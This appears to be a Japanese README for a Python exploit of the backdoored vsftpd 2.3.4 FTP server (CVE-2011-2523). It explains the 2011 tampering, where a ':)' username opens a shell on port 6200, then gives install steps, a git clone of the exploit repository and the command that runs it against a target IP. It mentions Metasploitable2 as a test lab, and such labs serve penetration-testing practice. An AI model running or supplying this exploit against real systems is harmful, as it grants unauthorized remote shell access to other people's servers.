
vsftpd 2.3.4 - バックドアコマンド実行のためのPythonエクスプロイト
vsftpd(Very Secure FTP Daemonの略)は、Linuxを含むUnix系システム向けのFTPサーバーです。GNU General Public Licenseの下でライセンスされています。IPv6とSSLをサポートしています。
2011年7月、マスターサイトからダウンロード可能なvsftpdバージョン2.3.4が改ざんされていることが発見されました。脆弱性のあるvsftpd-2.3.4サーバーにログインするユーザーは、ユーザー名として:)(スマイルマーク)を指定すると、ポート6200でコマンドシェルを取得できてしまいます。これはvsftpdのセキュリティホールの問題ではなく、バックドアを含む別のバージョンのvsftpdがアップロードされていたためです。その後、サイトはGoogle App Engineに移行されました。
sudo apt update
sudo apt install python3
sudo apt install python3-pip
pip install argparse
git clone https://github.com/padsalatushal/CVE-2011-2523.git
cd ./CVE-2011-2523
chmod +x exploit.py
python3 exploit.py -host Target_IP
例: python3 exploit.py -host 192.168.168.128

このエクスプロイトはMetasploitable2でテストできます。